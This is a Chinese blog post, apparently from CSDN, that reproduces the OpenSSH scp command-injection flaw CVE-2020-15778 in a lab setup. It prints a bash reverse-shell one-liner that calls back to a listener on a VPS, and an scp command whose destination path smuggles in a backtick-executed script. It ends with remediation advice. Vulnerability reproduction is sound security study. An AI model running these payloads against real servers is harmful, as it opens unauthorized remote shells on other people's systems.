centos7输入shell找不到命令_CVE202015778 OpensshSCP 命令注入漏洞复现

最新推荐文章于 2022-08-16 10:15:00 发布
最新推荐文章于 2022-08-16 10:15:00 发布
阅读量271 收藏
点赞数
文章标签: centos7输入shell找不到命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34446948/article/details/112231885
版权

刚刚好这几遇见了不少OPENSSH命中该漏洞版本的就复现一下。

本文参考字节脉搏等 字节脉搏EXP调用失败可能为环境问题。

感谢福林表哥提供第二个exp 反弹shell成功。

01漏洞介绍

CVE编号:CVE-2020-15778

发布时间:2020-07-24

危害等级:高危

漏洞版本:<= openssh-8.3p1

漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

参考链接来自CNNVD

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202007-1519

02环境准备

一台centos7  一台kali  一台公网vps (反弹shell用)

b70a0f8cbd3650d7ffb44eb1a8c0104d.png

03复现开始

 测试scp是否能连上 编写一个txt 然后连接环境

94a7102ebe101e5ffcf79a1d145a5dcd.png

scp 1.txt root@IP:/tmp/1.txt  | 测试传到tmp下1.txt 测试成功

35d7964389c24749b1bbc139403436ce.png

2b22349e8da580f186a4cf36e78406cf.png

编写反弹shell 语句 最简单的

bash -i >& /dev/tcp/IP/端口 0>&1

服务器监听端口

150f56c1b76a52a4b8139be773712d2d.png

首先 需要给1.sh权限 直接777吧

4d6b6106340daab4e7f0076e4db9050c.png

然后首先需要把1.sh传上去 才可以进行下一步

d469ebf1ab4664a049563096d8b2e814.png

调用字节脉搏的exp 报错的异常 有点看不懂

scp 1.sh root@IP:/’`sh /tmp/1.sh`’

71f7cff2f463725e61b90014dc6f4d21.png

然后联系了一下福林表哥 换了一个exp 成功 由于不确定是否是公开的先隐藏把 

4da81b1d58af84e1d3cf48044f566847.png

看公网服务器的监听 反弹shell成功

cc8318e07f90bf9588d81eb9e32a38ab.png

04实验总结

个人看法 利用过于鸡肋 绕过拿到ssh密码了 一般是可以直连的,当然如果打CTF之类的比赛的话 当我没说 

05安全建议

官方尚未发布安全更新补丁密切关注厂商主页获取解决办法:

http://www.openssh.com/portable.html

如果对你有用 不如点个关注 转发一下文章

欢迎大佬们加好友吹水聊天

967cb2639714e1f4145e611884762629.png

水妹子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OpenSSH命令注入漏洞复现(CVE-2020-15778)
千寻的博客
03-06 1万+
漏洞名称 OpenSSH命令注入漏洞 漏洞编号 CVE-2020-15778 漏洞描述 OpenSSH8.3p1及之前版本中scpscp.c文件存在操作系统命令注入漏洞。 该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。 攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshellOpenSSH简介 OpenSSH是 SSH(Secure SHell) 协议的免费开源实现。
关于CentOS 7下sqlite3不到的问题解决
01-09
本文主要给大家介绍的关于CentOS 7下sqlite3不到问题的解决方法,分享出来供大家参考学习,下面来一起看看详细的介绍: Centos7下的nltk启动问题 CentOS 7, Python 3.6,ipython 6.0.0 问题描述 ipython 启动...
openssh安装_CVE202015778OpenSSH命令注入漏洞复现
weixin_39577422的博客
12-06 302
上方蓝色字体关注我们,一起学安全!作者:Menge&小泫@Timeline Sec本文字数:1160阅读时长:3~4min声明:请勿用作违法用途,否则后果自负0x01 简介OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, sc...
git常用命令总结
weixin_48718444的博客
10-29 97
一、 git init 初始化空的 git仓库 二、配置 git config --list 显示当前的git 配置 git config -e – [各种配置文件] 编辑git 配置文件 三 、增加/删除文件 git add +文件名 添加文件到暂存区 rm +文件名 删除工作区文件,并且将这次删除放入暂存区 (1)确实删除就 先 git rm 文件 再 git commit (2)想撤销就用git checkout 文件名 四 、代码提交 git commit -m " " 将暂存
CentOS7系统升级OpenSSH-修复低版本CVE漏洞
weixin_36740201的博客
06-08 515
1、查看当前版本 ssh-V 2、下载相关依赖包 1 yuminstall-y gcc openssl-devel pam-devel rpm-build 3、下载安装包 openssh-8.6p1.tar.gz 1 wget http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.6p1.tar.gz 4...
linux scp命令不到,bashscp:未命令的解决方法-linux运维
weixin_42477197的博客
05-14 2014
scp命令用于通过ssh在两台服务器之间传输文件。大多数scp用户在系统中已经可以使用scp命令,但它仍然显示“bash:scp:command not found”。因此注意,scp命令必须在本地和远程系统上都可用才可以避免这个问题。安装SCP命令scp命令来自Red Hat系统上的openssh-clients软件包,openssh-client软件包用于基于Debian的系统。可以使用以下...
CentOS 7 下 通过shell + expect 实现 scp 文件(目录)传输
u013204013的博客
03-08 3393
scp介绍: 实现终端之间文件的传输,即可以将本地文件发送到远端相应目录下,也可以将远端目录下的文件拷贝到当前目录 SYNOPSIS      scp [-12346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file] [-l limit] [-o ssh_option] [-P port] [-S program] [[user@]h
[ 漏洞复现篇 ] Apache Spark 命令注入(CVE-2022-33891)
qq_51577576的博客
08-16 1957
Apache Spark 命令注入(CVE-2022-33891) 👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!...
[ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)
qq_51577576的博客
08-05 1840
Linux scp 命令用于 Linux 之间复制文件和目录。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。...
centos (linux) shell常用命令实例手册
03-05
centos (linux) shell常用命令实例手册大全,包括:常用shell命令、语法、环境配置、实例、mysql、jdk、hadoop、hdfs、keepalive、文件操作、软件安装、系统、权限、服务、网络、磁盘管理 等各个方面的shell实例
centos 7中firewall防火墙的常用命令总结
09-15
大家都知道centos 7中防火墙是一个非常的强大的功能了,但对于centos 7中在防火墙中进行了升级了,下面这篇文章主要介绍了centos 7中firewall防火墙的常用命令,需要的朋友可以参考借鉴,下面来一起看看吧。
centOS7常用命令资料整理.txt
05-28
centOS7常用命令资料整理
数字化转型背景下的企业数据资产管理两份文件.pptx
07-02
数字化转型背景下的企业数据资产管理两份文件.pptx
C#输出所有排列组合代码正确例题.txt
07-02
C#输出所有排列组合代码正确例题
SM2259三星512Gsata M2固态量产工具,MT29F512G08EBLDE,59XIB37D-512VO
07-02
颗粒型号含MT29F512G08EBLDE或FWNSS59XIB37D-512VO
2022-2028全球与中国PCB钻针市场现状及未来发展趋势.docx
最新发布
07-02
2022-2028全球与中国PCB钻针市场现状及未来发展趋势.docx
新型智慧城市整体规划建设方案双份文档.pptx
07-02
新型智慧城市整体规划建设方案双份文档.pptx
centos7ipconfig不到命令
03-16
这个问题可能是因为您的CentOS 7系统中没有安装net-tools软件包导致的。您可以通过以下命令安装该软件包: sudo yum install net-tools 安装完成后,您应该能够使用ipconfig命令了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值